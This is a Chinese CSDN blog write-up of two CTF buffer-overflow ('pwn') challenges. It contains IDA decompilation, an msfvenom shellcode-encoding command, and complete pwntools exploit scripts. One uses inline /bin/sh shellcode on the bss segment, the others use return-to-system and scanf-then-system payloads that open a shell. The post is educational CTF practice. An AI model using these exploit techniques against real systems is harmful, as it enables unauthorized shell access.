pwn bof 两题

最新推荐文章于 2022-04-29 22:51:54 发布
最新推荐文章于 2022-04-29 22:51:54 发布
阅读量1.9k 收藏
点赞数 1
分类专栏: Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/think_ycx/article/details/68961505
版权

pwn1

thought

carter学长给的bof题目,题目比较奇葩= =。IDA能分析个大概:

int sub_8048582()
{
  alarm(0x3Cu);
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  dword_804A160 = sub_804856D;
  printf("C'mon pwn me : ");
  __isoc99_scanf("%s", &unk_804A060);
  dword_804A160();
  return 0;
}

存在bof的buff位于bss段上,而且源程序中直接call buf之后的一个地址了。

.text:080485E7                 call    _printf
.text:080485EC                 mov     dword ptr [esp+4], offset unk_804A060
.text:080485F4                 mov     dword ptr [esp], offset aS ; "%s"
.text:080485FB                 call    ___isoc99_scanf
.text:08048600                 mov     eax, ds:dword_804A160
.text:08048605                 call    eax ; dword_804A160
.text:08048607                 mov     eax, 0

总结

  1. scanf读入的payload中不能有whitespace,所以原来的21bytes shellcode就不能用了,存在”\x0b”。

  2. 使用msfvenom生成shellcode

cat input | msfvenom -p - -a x86 --platform linux -e x86/shikata_ga_nai -b '\x00\x0a\x0b\x0d\xff' -f python -o output

exp

from pwn import *
import time

debug = 1
local = 1
attach = local & 0
bps = attach & 0
proc_name = 'pwn1'
#socat TCP4-LISTEN:10001,fork EXEC:./pwn1
ip = '127.0.0.1'
port = 10001
io = None

def makeio():
    global io 
    if local:
        io = process(proc_name)
    else:
        io = remote(ip,port)
def ru(data):
    return io.recvuntil(data)
def rv():
    return io.recv()
def sl(data):
    return io.sendline(data)
def sn(data):
    return io.send(data)
def rl():
    return io.recvline()

def pwn():
    makeio()
    if debug:
        context.log_level = 'debug'
    if attach:
        if bps:
            gdb.attach(pidof(proc_name)[0], open('bps'))
        else:
            gdb.attach(pidof(proc_name)[0])
    bss_addr = 0x0804A060
    sc_scanf =  "\x31\xc0\xb0\x30\x01\xc4\x30\xc0"
    sc_scanf += "\x50\x68\x2f\x2f\x73\x68\x68\x2f"
    sc_scanf += "\x62\x69\x6e\x89\xe3\x89\xc1\xb0"
    sc_scanf += "\xb0\xc0\xe8\x04\xcd\x80\xc0\xe8"
    sc_scanf += "\x03\xcd\x80"
    ru('C\'mon pwn me :')
    payload = sc_scanf.ljust(256,chr(0x90)) + p32(bss_addr)
    sl(payload)
    io.interactive()

if __name__ == '__main__':
    pwn()

pwn2

thoughts

IDA pro分析:


int __cdecl ShowInfo(char *src)
{
  char dest[2]; // [sp+10h] [bp-88h]@1
  __int16 v3; // [sp+12h] [bp-86h]@1
  int v4; // [sp+14h] [bp-84h]@1

  *(_WORD *)dest = 0;
  v3 = 0;
  memset(&v4, 0, 0x7Cu);
  strcpy(dest, src);
  return printf("your name:%s\n", dest);
}

本题觉得比较难:
1. 溢出点位于ShowInfo中,传入参数为最大长度256的字符串。可以通过bof覆盖返回地址,但不知道栈的地址,无法指向buf。
2. 程序中有system函数,觉得这点可用:控制esp指向/bin/sh,返回地址填call system的地址。但控制esp是难点。对比ret2libc,栈如此布置:返回地址 + 指向/bin/sh的指针。这里是call,只需要把指向/bin/sh的指针放在栈顶,再call system即可。可是,无法构造这个指针。

总结

way1

gdb中 find ‘sh’ 可以找到sh的地址,直接布置bofpayload中callsys_addr之后即可。

way2

在bof中通过scanf读取/bin/sh,函数返回到system_plt。
注意scanfbuf_addr要是一个可读可写的地址。

==不过为何0x804a1a6可以,而0x804a100不可以呢?==

padding
scanf_plt
system_plt
scanfformat_addr
scanfbuf_addr

exp

...


def pwn1():
    callsys_addr = 0x080487BD
    sh_addr = 0x80482ea
    ru('input your name:')
    payload = '\x41'*0x88 + p32(0xdeadbeaf) + p32(callsys_addr) +p32(sh_addr)
    sl(payload)
    ru(':')
    sl('1')
    io.interactive()

def pwn():
    makeio()
    if debug:
        context.log_level = 'debug'
    if attach:
        if bps:
            gdb.attach(pidof(proc_name)[0], open('bps'))
        else:
            gdb.attach(pidof(proc_name)[0])

    sys_plt = 0x080484B0
    scanf_plt = 0x080484F0 
    scanf_format = 0x0804888F
    scanf_buf = 0x804a1a6  #0x804a100

    payload = '\x41'*0x88 + p32(0xdeadbeaf) + p32(scanf_plt) +p32(sys_plt) + p32(scanf_format)  +p32(scanf_buf)
    ru('input your name:')
    sl(payload)
    ru(':')
    sl('1')
    sl('/bin/sh')
    io.interactive()
think_ycx
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 2008
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
学习缓冲区溢出攻击的前提知识
weixin_46564355的博客
10-15 986
缓冲区溢出(Buffer overflow)攻击 方法是很久之前就发表出来的技术,但是至今为止仍依然被广泛使用。这其中最大的原因就是目前还有很多程序很容易遭受buffer overflow(BOF)攻击。到目前为止,有许多相关对缓冲区溢出的解决方法的文档,但是大部分文档只针对技术性的方法进行说明,对于其原理和系统构造的说明非常少。但是理解BOF最不能缺少的就是对计算机在运行过程中的关于数据和结构的存储方法、函数调用和返回过程以及函数执行过程底层的准确信息。
pwnbof
jxz_dz的博客
11-04 907
有一两周没更新了,坚持... 接着前边继续第三篇bof. 这次让我们直接下载bof.c,以及bof文件.分析代码和文件,然后在pwnable.kr 9000执行,获取flag 1.先看下bof.c的代码: #include <stdio.h> #include <string.h> #include <stdlib.h> void func(i...
pwn刷题num37---栈溢出 + strcpy函数溢出
tbsqigongzi的博客
04-29 786
BUUCTF-PWN-ciscn_2019_ne_5 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 程序运行后让我们输入密码, ida一下看一下主函数 看来要想进行下面的操作,必须输入password:administrator if ( strcmp(s1, “administr
pwn入门2
九层台
03-28 439
bof 首先输入2个网址,得到了一个源代码一个elf文件 #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;stdlib.h&gt; void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overfl...
CTF PWN setbuf 的利用
qq_41071646的博客
08-09 1775
要说 setbuf 之前 要好好说一下 stdin stdout stderr 是stdio库中的文件流 其实 看名字都能看出来这是干啥的 stdin 是 标准输入 在文件标识符是 0 stdout 是 标准输出 在文件标识符是 1 stderr 是标准错误输出 在文件标识符是 2 其实 可以简单的理解成 stdin 是输入流 等待着键盘输入 stdout...
PWN题[强网先锋]no_output
am_03的博客
09-02 464
知识点 strcpy(dest, src) strcpy 函数用于将指定长度的字符串复制到字符数组里 语法形式为:char *strcpy(char *dest, const char *src, int n), 表示把src所指向的字符串里以src地址开始的前n个字节复制到dest所指的数组里,并返回被复制后的dest。 strcpy:strcpy只用于字符串复制,并且它不仅复制字符串内容之外,还会复制字符串的结束符 例:strcpy(a,b) b为源字符串,a为复制b的字符串 read(unk_804C
CTF PWN 武器库题
12-12
"CTF PWN 武器库题"通常指的是这类竞赛中的一个问题,挑战者需要利用编程技巧来解决安全漏洞,获取系统的控制权。在这个特定的案例中,我们面对的题目是"rifle",它涉及到fastbin堆溢出,这是一种常见的内存管理漏洞...
warmup pwn入门题
02-11
pwn入门题
welpwn pwn 入门题
02-11
pwn 入门题
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
pwn基础知识笔记
月阴荒的博客
02-20 2318
算是总的开一篇文章,把学到的知识总结一下,之后会重复写到各个文章里面 checksec指令, 用来查询pwn题目的壳和保护,并且能够看到程序的信息 1.Canary保护 参考链接:https://blog.csdn.net/weixin_44540286/article/details/101629735?utm_source=distribute.pc_relevant.none-task Ca...
0x03-逆向-BoF基础的基础
0pr
06-04 1020
目录 今日目标 深入 BoF BoF 的前世今生 BoF 的种类 BoF 的应对策略 物理寻址的应用 找到 Boot Sector 在内存中的前两个字节的位置 寄存器 寄存器的种类 通用寄存器 段寄存器 指针寄存器 索引寄存器 控制寄存器 段和段寄存器小结 完成任务 程序拆解及必要汇编指令 org 指令 jmp 指令 times 指令 pusha popa 指令 条件控制指令 其他必要的汇编指令 总结 参考链接 今日目标 今天细看了一下 narnia2(不知道这是什
pwnable.kr-bof-Writeup
逐梦小涛
02-08 1601
MarkdownPad Document pwnable.kr-bof-Writeup 在http://pwnable.kr/bin/bof.c得到C代码如下: 1 #include 2 #include string.h> 3 #include 4 void func(int key){ 5 char overflowme[32]; 6 pri
PWN-bof
MuMuLee_的博客
08-26 541
题目给出一个PWN文件和两个netcat端口 解题步骤 1、ubuntu ->下载PWN文件,找到文件所在位置打开终端-> file命令 看到是一个32位的ELF文件 2、回win10 ,分析漏洞类型 把pwn文件拖进32位的ida 查看main函数的反汇编代码 sub_8048573 用到read函数,看一下汇编代码 3、解题方法 构造payload=‘a’*个数+返回地址...
pwnable.kr-----解题过程】bof
lyuchen65的博客
09-16 2408
#include #include #include void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); if(key == 0xcafebabe){ system("/bin/sh"); } else {
pwnable.kr之bof
river
05-01 4403
bof   两种方法来做吧(就是入门为了练习,多接触一些。。。) 方法1:用ida直接看 算一下 输入的字符串s是ebp-2c 参数1 a1是ebp+8 距离是52,所以要覆盖52个字符。 但是这么简单的程序,抓住机会,小白练习一下gdb 方法2:用GDB调试,算参数地址 gdb bof
攻防世界pwn新手题答案
最新发布
08-10
回答: 对于攻防世界pwn新手题,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值